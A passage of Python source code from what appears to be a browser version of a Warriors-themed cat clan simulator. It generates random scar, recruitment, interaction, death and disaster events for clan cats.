to check out a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n 
scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n\n elif chance == 1 and other_cat.status == 'leader' and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic',\n 'controlling', 'fierce', 'petty'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n\n if scar_text:\n game.cur_events_list.append(choice(scar_text))\n\n def invite_new_cats(self, cat):\n chance = 100\n if self.living_cats < 10:\n 
chance = 100\n elif self.living_cats > 50:\n chance = 700\n elif self.living_cats > 30:\n chance = 300\n if randint(1, chance\n ) == 1 and cat.age != 'kitten' and cat.age != 'adolescent':\n self.new_cat_invited = True\n name = str(cat.name)\n type_of_new_cat = choice([1, 2, 3, 4, 5, 6, 7])\n if type_of_new_cat == 1:\n kit = Cat(moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, kit))\n relationships.append(Relationship(kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n kit_text = [\n f'{name} finds an abandoned kit and names them {str(kit.name)}',\n f'A loner brings their kit named {str(kit.name.prefix)} to the clan, stating they no longer can care for them'\n ]\n game.cur_events_list.append(choice(kit_text))\n self.check_age(kit)\n\n elif type_of_new_cat == 2:\n self._extracted_from_invite_new_cats_19(name)\n\n elif type_of_new_cat == 3:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n loner.skill = 'formerly a loner'\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner who joins the clan',\n f'A loner says that they are interested in clan life and joins the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The loner changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 4:\n warrior = Cat(status='warrior', moons=randint(12, 150))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(\n the_cat, warrior))\n relationships.append(Relationship(warrior, the_cat))\n warrior.relationships = relationships\n game.clan.add_cat(warrior)\n warrior_text = []\n if len(game.clan.all_clans) > 0:\n warrior_text.extend([\n f'{name} finds a warrior from {str(choice(game.clan.all_clans).name)}Clan named {str(warrior.name)} who asks to join the clan',\n f'An injured warrior from {str(choice(game.clan.all_clans).name)}Clan asks to join in exchange for healing'\n ])\n else:\n warrior_text.extend([\n f'{name} finds a warrior from a different clan named {str(warrior.name)} who asks to join the clan'\n ])\n game.cur_events_list.append(choice(warrior_text))\n self.check_age(warrior)\n\n elif type_of_new_cat == 5:\n self._extracted_from_invite_new_cats_47(name)\n elif type_of_new_cat == 6:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {choice(names.loner_names)} who wants to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n 
game.cur_events_list.append(\n 'The kittypet changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 7:\n parent1 = cat.name\n kits = choice([1, 1, 2, 2, 2, 3])\n for kit in range(kits):\n if cat.mate is not None:\n kit = Cat(parent1=cat.ID, parent2=cat.mate, moons=0)\n game.clan.add_cat(kit)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID in [kit.parent1, kit.parent2]:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n else:\n kit = Cat(parent1=cat.ID, moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID == kit.parent1:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n if len(game.clan.all_clans) > 0:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own',\n f'A {str(choice(game.clan.all_clans).name)}Clan queen decides to leave their litter with you. {str(parent1)} takes them as their own'\n ])\n else:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them as their own',\n f'A loner leaves their litter to the clan. 
{str(parent1)} decides to adopt them as their own'\n ])\n game.cur_events_list.append(choice(Akit_text))\n self.check_age(kit)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_59(self, loner):\n loner.skill = 'formerly a kittypet'\n if choice([1, 2]) == 1:\n loner.specialty2 = choice(scars3)\n game.clan.add_cat(loner)\n self.check_age(loner)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_47(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {str(loner_name)} who wants to join the clan',\n f'A kittypet named {str(loner_name)} stops {name} and asks to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_19(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n loner.skill = 'formerly a loner'\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner named {str(loner.name)} who joins the clan',\n f'A loner named {str(loner.name)} waits on the border for a patrol, asking to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n self.check_age(loner)\n\n def other_interactions(self, cat):\n if randint(1, 100) != 1:\n return\n interactions = []\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n name = str(cat.name)\n other_name = str(other_cat.name)\n if cat.status in ['warrior', 'deputy'] and randint(\n 1, 15) == 1 and game.settings.get('retirement') is True:\n game.cur_events_list.append(\n f'{name} retires to the elders den after injuries sustained defending {other_name}'\n )\n if cat.status == 'deputy':\n game.clan.deputy = None\n\n cat.status_change('elder')\n return\n if cat.status == 'kitten' and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}'\n ])\n elif cat.status in ['apprentice', 'medicine cat apprentice'] and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by 
{other_name}',\n name +\n \" accidentally trespasses onto another clan\\'s territory\"\n ])\n if other_cat.status == 'apprentice':\n interactions.append(\n f'{name} sneaks out of camp with {other_name}')\n elif cat.status == 'warrior':\n interactions.extend([\n name + \" is caught outside of the Clan\\'s territory\",\n f'{name} is caught breaking the Warrior Code',\n f'{name} went missing for a few days',\n f'{name} believes they are a part of the new prophecy'\n ])\n elif cat.status == 'medicine cat':\n interactions.extend([\n f'{name} learns of a new prophecy',\n f'{name} is worried about an outbreak of greencough',\n f'{name} is worried about how low their herb stores has gotten',\n f'{name} visits the other medicine cats'\n ])\n elif cat.status == 'deputy':\n interactions.extend([\n f'{name} thinks about retiring',\n f'{name} travels to the other clans to bring them an important message'\n ])\n elif cat.status == 'leader':\n if game.clan.leader_lives <= 5:\n interactions.extend([\n f'{name} thinks about retiring',\n name + \" confesses they don\\'t have many lives left\"\n ])\n if other_cat.status not in [\n 'kitten', 'apprentice', 'medicine cat apprentice'\n ]:\n interactions.append(\n f'{name} confesses to {other_name} that the responsibility of leadership is crushing them'\n )\n elif other_cat.status == 'apprentice':\n interactions.append(f'{name} assesses {other_name}' +\n \"\\'s progress\")\n interactions.extend([\n f'{name} calls a clan meeting to give an important announcement'\n ])\n elif cat.status == 'elder':\n interactions.extend(\n [f'{name} is brought back to camp after wandering off'])\n if cat.age == other_cat.age:\n interactions.extend([\n f'{name} tries to convince {other_name} to run away together'\n ])\n\n if interactions:\n game.cur_events_list.append(choice(interactions))\n\n def handle_deaths(self, cat):\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n #Leader lost a life EVENTS\n if randint(1, 100) == 1:\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.status == 'leader' or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n if cat.status == 'leader':\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' lost a life after falling into a river',\n name + ' lost a life due to greencough',\n name + ' lost a life due to whitecough',\n 'Lightning fell in camp and ' + name + ' lost a life',\n name + ' was mortally wounded by a fox', name +\n ' lost a life to a dog', name + ' lost a life to a badger',\n name + ' lost a life to a hawk',\n name + ' lost a life due to yellowcough',\n name + ' lost a life while fighting off a rogue',\n name + ' lost a life to an eagle', name +\n ' was grabbed and dropped by an eagle, losing a life',\n name + ' was grabbed and dropped by a hawk, losing a life',\n name + ' lost a life after being swept away by a flood',\n name + ' lost a life after falling off a tree',\n name + ' was bit by a venomous spider and lost a life',\n name + ' was bit by a venomous snake and lost a life',\n name + ' ate poisoned fresh-kill and lost a life', name +\n ' failed to interpret a warning sign from StarClan and lost a life as a result',\n name + ' lost a life defending ' + other_name +\n ' from a dog', name + ' lost a life defending ' +\n other_name + ' from a 
badger', name +\n ' lost a life defending ' + other_name + ' from a fox',\n name + ' lost a life defending ' + other_name +\n ' from a hawk', name + ' lost a life defending ' +\n other_name + ' from an eagle',\n name + ' lost a life while saving ' + other_name +\n ' from drowning', name + ' lost a life while saving ' +\n other_name + ' from a monster',\n name + ' was pushed under a monster and lost a life',\n name + ' lost a life after saving ' + other_name + ' from a snake'\n ]\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a life defending the kits from ' +\n choice(game.clan.all_clans).name + 'Clan warriors',\n name + ' lost a life defending ' + other_name +\n ' from ' + choice(game.clan.all_clans).name +\n 'Clan warriors', name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan apprentice',\n name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan warrior'\n ])\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n #Several/All Lives loss\n elif randint(1,200) == 1 and cat.status == 'leader': \n name = str(cat.name)\n allorsome = randint(1, 10)\n if cat.status == 'leader':\n if allorsome == 1:\n cause_of_death = [\n name +\n ' was brutally attacked by a rogue and lost all of their lives',\n name +\n ' was mauled by dogs and lost all of their lives',\n name +\n ' was carried off by an eagle, never to be seen again',\n name +\n ' was carried off by a hawk, never to be seen again',\n name + ' was taken by twolegs, never to be seen again',\n name +\n ' fell into a river and was swept away by the current, never to be seen again',\n name +\n ' was burnt alive while trying to save their clanmates from a fire'\n ]\n if self.at_war and len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' was brutally murdered by a ' +\n choice(game.clan.all_clans).name +\n 'Clan warrior and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan deputy and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan leader and lost all of their lives'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was buried alive in an avalanche',\n name + ' was buried alive by a landslide', name +\n ' was pushed off a cliff with sharp rocks at the bottom',\n name +\n ' accidentally fell off a cliff with sharp rocks at the bottom'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name +\n ' was washed out to sea and was never seen again',\n name +\n ' was lost to sea while saving a clanmate from drowning'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name +\n ' fell into a sinkhole and was never seen again',\n name +\n ' fell into a hidden burrow and was buried alive',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n game.clan.leader_lives -= 10\n else:\n lostlives = choice([2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6])\n cause_of_death = [\n name + ' lost ' + str(lostlives) +\n ' lives due to greencough', name + ' lost ' +\n str(lostlives) + ' lives due to whitecough',\n name + ' lost ' + str(lostlives) +\n ' lives due to yellowcough', name + ' lost ' +\n str(lostlives) + ' lives due to an illness',\n name + ' lost ' + str(lostlives) +\n ' lives due to an infection'\n ]\n game.clan.leader_lives = game.clan.leader_lives - lostlives\n self.dies(cat)\n 
game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 400) == 1:\n name = str(cat.name)\n cause_of_death = [\n name + ' was murdered', name + ' died of greencough',\n 'A tree fell in camp and killed ' + name,\n name + ' was found dead near a fox den',\n name + ' was bitten by a snake and died'\n ]\n if clan_has_kits == True and cat.status != 'kitten':\n cause_of_death.extend([\n name + ' was bitten by a snake while saving a kit and died'\n ])\n if cat.status == 'kitten':\n cause_of_death.extend([\n name + ' fell into a river and drowned',\n name + ' was taken by a hawk',\n name + ' grew weak as the days passed and died',\n name + ' was killed after sneaking out of camp',\n name + ' died after accidentally eating deathberries',\n name +\n ' was killed in their sleep after a snake snuck into camp'\n ])\n if game.clan.current_season == 'Leaf-bare':\n cause_of_death.extend([\n name + ' was found dead in the snow',\n name + ' froze to death in a harsh snowstorm', name +\n ' disappeared from the nursery and was found dead in the territory',\n name +\n ' was playing on the ice when the ice cracked and they drowned'\n ])\n if game.clan.current_season == 'Greenleaf':\n cause_of_death.extend([name + ' died to overheating'])\n elif cat.status == 'apprentice':\n cause_of_death.extend([\n name + ' died in a training accident', name +\n ' was killed by enemy warriors after accidentally wandering over the border',\n name + ' went missing and was found dead',\n name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed to death by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n elif cat.status == 'warrior' or cat.status == 'deputy':\n if len(game.clan.all_clans) > 0:\n cause_of_death.append(name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border')\n cause_of_death.extend([\n name + ' died from infected wounds',\n name + ' went missing and was found dead'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' was killed by enemy ' +\n self.enemy_clan + ' warriors',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and died', name +\n ' fell into a hidden burrow and could not get out',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n #Leader loses a life\n elif cat.status == 'leader':\n cause_of_death = []\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a live to greencough',\n 'A tree fell in camp and ' + name + ' lost a life'\n ])\n cause_of_death.extend([\n name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border mortally injured'\n ])\n cause_of_death.extend([\n name + ' lost a life from infected wounds', name +\n ' went missing and was later found 
mortally wounded'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' lost a life in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' lost a life in an avalanche',\n name + ' lost a life in a landslide',\n name + ' was pushed off a cliff and lost a life',\n name + ' accidentally fell off a cliff and lost a life'\n ])\n elif game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and lost a life', name +\n ' was poisoned by a sea creature and lost a life'\n ])\n elif game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and lost a life',\n name + ' fell into a hidden burrow and lost a life',\n name + ' lost a life when a burrow collapsed on them'\n ])\n elif self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy and lost a life',\n name + ' was killed by the ' + self.enemy_clan +\n ' leader and lost a life'\n ])\n\n elif cat.status == 'medicine cat' or cat.status == 'medicine cat apprentice':\n cause_of_death.extend([\n 'The herb stores were damaged and ' + name +\n ' was murdered by an enemy warrior'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by a ' + self.enemy_clan +\n ' warrior while pulling an injured cat out of the battlefield'\n ])\n if cat.status == 'deputy':\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy', name + ' was killed by the ' +\n self.enemy_clan + ' leader'\n ])\n\n if cat.status == 'leader':\n game.clan.leader_lives -= 1\n self.dies(cat)\n\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 500) == 1: # multiple deaths\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' and ' + other_name + ' die of greencough',\n name + ' and ' + other_name + ' die of yellowcough',\n name + ' and ' + other_name + ' die of whitecough',\n name + ' and ' + other_name + ' die from eating poisoned prey'\n ]\n if cat.status == ['kitten', 'leader'] or other_cat.status == ['kitten', 'leader']:\n cause_of_death.extend([\n name + ' and ' + other_name +\n ' are killed in a border skirmish',\n name + ' and ' + other_name +\n ' are killed in a battle against a gang of rogues'\n ])\n if cat.mate is not None and cat.age == other_cat.age and other_cat.mate is None:\n if cat.status == 'leader':\n game.clan.leader_lives -= 10\n game.cur_events_list.append(\n name + ' is killed by ' + other_name +\n ' in an argument over ' +\n str(cat_class.all_cats.get(cat.mate).name))\n self.dies(cat)\n return\n if cat.status == 'leader' or other_cat.status == 'leader':\n game.clan.leader_lives -= 1\n game.cur_events_list.append(choice(cause_of_death) + ' and the leader lost a life')\n else:\n game.cur_events_list.append(choice(cause_of_death))\n self.dies(cat)\n self.dies(other_cat)\n\n elif randint(1, 80) == 1: #Death with Personalities\n 
murder_chance = 20\n name = str(cat.name)\n countdown = int(len(cat_class.all_cats) / 3)\n other_cat = choice(list(cat_class.all_cats.values()))\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n if cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sneaky',\n 'sadistic', 'greedy', 'selfish'\n ] and other_cat.status in ['leader', 'deputy']:\n if cat.status == 'deputy' and other_cat.status == 'leader':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood to take their place',\n name + ' murdered ' + other_name +\n ' to take their place and made it look like an accident'\n ]\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status == 'warrior':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood '\n 'in hopes of taking their place',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental '\n 'in hopes of taking their place'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name + ' in cold blood',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status in [\n 'medicine cat', 'medicine cat apprentice'\n ] and cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' killed ' + other_name +\n ' by giving them deathberries', name + ' killed ' +\n other_name + ' by giving them foxglove seeds',\n name + ' killed ' + other_name +\n ' by giving them nightshade berries',\n name + ' killed ' + other_name +\n ' by giving them water hemlock',\n name + ' killed ' + other_name +\n ' by consciously giving them the wrong herbs'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n\n elif cat.moons > randint(150, 200): # extra chance of cat dying to age\n if choice([1, 2, 3, 4, 5, 6]) == 1:\n if cat.status != 'leader':\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n else:\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has lost a life due to their old age at ' +\n str(cat.moons) + ' moons old')\n if cat.status == 'leader' and cat.moons > 269:\n game.clan.leader_lives -= 10\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) + ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n\n if game.settings.get('disasters') is True:\n alive_count = 0\n alive_cats = []\n for cat in list(cat_class.all_cats.values()):\n if not cat.dead and not cat.exiled and cat.status != 'leader':\n 
alive_count += 1\n alive_cats.append(cat)\n if alive_count > 10:\n chance = int(alive_count / 10)\n if randint(chance, 1000) == 999:\n disaster = []\n dead_cats = random.sample(alive_cats, 5)\n name1 = str(dead_cats[0].name)\n name2 = str(dead_cats[1].name)\n name3 = str(dead_cats[2].name)\n name4 = str(dead_cats[3].name)\n name5 = str(dead_cats[4].name)\n disaster.extend([\n ' drown after the camp becomes flooded',\n ' are killed in a battle against ' +\n choice(names.normal_prefixes) + 'Clan',\n ' are killed after a fire rages through the camp',\n ' are killed in an ambush by a group of rogues',\n ' go missing in the night',\n ' are killed after a badger attack',\n ' die to a greencough outbreak',\n ' are taken away by twolegs',\n ' eat poisoned freshkill and die'\n ])\n if game.clan.current_season == 'Leaf-bare':\n disaster.extend([\n ' die after freezing from a snowstorm',\n ' starve to death when no prey is found'\n ])\n elif game.clan.current_season == 'Greenleaf':\n disaster.extend([\n ' die after overheating',\n ' die after the water dries up from drought'\n ])\n\n game.cur_events_list.append(name1 + ', ' + name2 + ', ' +\n name3 + ', ' + name4 +\n ', and ' + name5 +\n choice(disaster))\n for cat in dead_cats:\n self.dies(cat)\n\n def dies(self, cat): # This function is called every time a cat dies\n if cat.status == 'leader' and game.clan.leader_lives > 0:\n return\n elif cat.status == 'leader' and game.clan.leader_lives <= 0:\n cat.dead = True\n game.clan.leader_lives = 0\n else:\n cat.dead = True\n\n if cat.mate != None:\n cat.mate = None\n if type(cat.mate) == str:\n mate = cat_class.all_cats.get(cat.mate)\n mate.mate = None\n elif type(cat.mate) == Cat:\n cat.mate.mate = None\n\n for app in cat.apprentice.copy():\n app.update_mentor()\n cat.update_mentor()\n game.clan.add_to_starclan(cat)\n\n def check_age(self, cat):\n if 0 <= cat.moons <= 5:\n cat.age = 'kitten'\n elif 6 <= cat.moons <= 11:\n cat.age = 'adolescent'\n elif 12 <= cat.moons <= 47:\n cat.age = 'young adult'\n elif 48 <= cat.moons <= 95:\n cat.age = 'adult'\n elif 96 <= cat.moons <= 119:\n cat.age = 'senior adult'\n else:\n cat.age = 'elder'\n\nevents_class = Events()","repo_name":"Clangen-Web/clangen-web.github.io","sub_path":"scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":76705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
